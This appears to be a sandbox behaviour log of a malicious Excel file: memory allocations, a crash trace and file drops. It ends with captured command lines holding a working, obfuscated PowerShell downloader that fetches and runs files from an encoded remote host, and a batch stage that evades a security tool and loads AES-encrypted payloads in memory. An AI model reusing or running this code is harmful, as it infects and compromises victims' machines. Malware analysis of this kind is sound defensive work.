stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2084
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2084
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02592000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Application Crash Process EXCEL.EXE with pid 2248 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a
SLClose-0x28c osppc+0x2cb5 @ 0x67212cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x67225629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x67213412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x672229af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x7343a648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x6cce4a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x6cce4823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x6c5a30d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x6c5a2e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x6bdc2b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x6bdc2456
0x389631
_MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x6c59fd49
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6bae08cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6bacfa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6bacf808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6bacf7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6b903b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6b9022ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6ba9522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6ba95189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6ba9407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6ba93fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6ba93f6b
MdCallBack12-0x64a760 excel+0x37a4a @ 0x1207a4a
MdCallBack12-0x64de96 excel+0x34314 @ 0x1204314
MdCallBack12-0x67d476 excel+0x4d34 @ 0x11d4d34
MdCallBack12-0x67d76a excel+0x4a40 @ 0x11d4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 3338720
registers.edi: 3338884
registers.eax: 3338720
registers.ebp: 3338800
registers.edx: 0
registers.ebx: 3339936
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
file C:\Users\test22\AppData\Roaming\22.xlsx
file C:\Users\test22\AppData\Roaming\~$22.xlsx
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\22.xlsx.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\22.xlsx.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk
file C:\Users\test22\AppData\Roaming\xD.bat
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000004b8
filepath: C:\Users\test22\AppData\Roaming\~$22.xlsx
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Roaming\~$22.xlsx
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\22.xlsx.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\22.xlsx.LNK
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{Start-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGUpAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,47407,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky.DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$qTGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};function LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $aldNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47359,47359,47355,47429,47417,47424,47429));eakRTR $aldNWBtEYsFWYQcs $vAaZjEjBBMtrUakWGijG;Invoke-Item $aldNWBtEYsFWYQcs;};$pXwqbI = $QFvHDxxjhpnQC + 'xD.bat'; if (Test-Path -Path $pXwqbI){atSKPKjLPuNX $pXwqbI;}Else{ $kuPmPEtni = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47429,47377,47355,47407,47406,47425));eakRTR $pXwqbI $kuPmPEtni;atSKPKjLPuNX $pXwqbI;};;;;}LztbGmYEiJQs;
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
cmdline C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"
cmdline powershell.exe -ExecutionPolicy UnRestricted function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{Start-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGUpAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,47407,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky.DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$qTGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};function LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $aldNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47359,47359,47355,47429,47417,47424,47429));eakRTR $aldNWBtEYsFWYQcs $vAaZjEjBBMtrUakWGijG;Invoke-Item $aldNWBtEYsFWYQcs;};$pXwqbI = $QFvHDxxjhpnQC + 'xD.bat'; if (Test-Path -Path $pXwqbI){atSKPKjLPuNX $pXwqbI;}Else{ $kuPmPEtni = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47429,47377,47355,47407,47406,47425));eakRTR $pXwqbI $kuPmPEtni;atSKPKjLPuNX $pXwqbI;};;;;}LztbGmYEiJQs;
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
